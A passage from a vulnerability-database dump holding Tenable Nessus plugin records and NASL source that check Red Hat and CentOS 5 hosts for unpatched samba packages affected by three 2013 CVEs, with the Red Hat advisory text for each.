session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 21, "published": "2013-10-01T00:00:00", "title": "RHEL 5 : samba3x (RHSA-2013:1310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2013-10-01T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba3x-winbind", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba3x-common", "p-cpe:/a:redhat:enterprise_linux:samba3x-doc", "p-cpe:/a:redhat:enterprise_linux:samba3x-swat", "p-cpe:/a:redhat:enterprise_linux:samba3x-client", "p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba3x", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel"], "id": "REDHAT-RHSA-2013-1310.NASL", "href": "https://www.tenable.com/plugins/nessus/70245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1310. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70245);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2013:1310\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2013:1310)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n # https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6b506c4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:1310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4124\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1310\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-debuginfo-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-3.6.6-0.136.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-devel-3.6.6-0.136.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:29:25", "description": "Updated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 25, "published": "2014-03-18T00:00:00", "title": "CentOS 5 : samba (CESA-2014:0305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-03-18T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2014-0305.NASL", "href": "https://www.tenable.com/plugins/nessus/73063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0305 and \n# CentOS Errata and Security Advisory 2014:0305 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73063);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2014:0305\");\n\n script_name(english:\"CentOS 5 : samba (CESA-2014:0305)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-March/020204.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ede9083b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0213\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-devel-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-common-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:28:58", "description": "Updated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 25, "published": "2014-11-12T00:00:00", "title": "CentOS 5 : samba3x (CESA-2013:1310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-11-12T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba3x-doc", "p-cpe:/a:centos:centos:samba3x-client", "p-cpe:/a:centos:centos:samba3x-swat", "p-cpe:/a:centos:centos:samba3x-common", "p-cpe:/a:centos:centos:samba3x-winbind", "p-cpe:/a:centos:centos:samba3x", "p-cpe:/a:centos:centos:samba3x-winbind-devel", "p-cpe:/a:centos:centos:samba3x-domainjoin-gui", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2013-1310.NASL", "href": "https://www.tenable.com/plugins/nessus/79150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1310 and \n# CentOS Errata and Security Advisory 2013:1310 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79150);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2013:1310\");\n\n script_name(english:\"CentOS 5 : samba3x (CESA-2013:1310)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-October/000872.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?238d147b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0213\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) 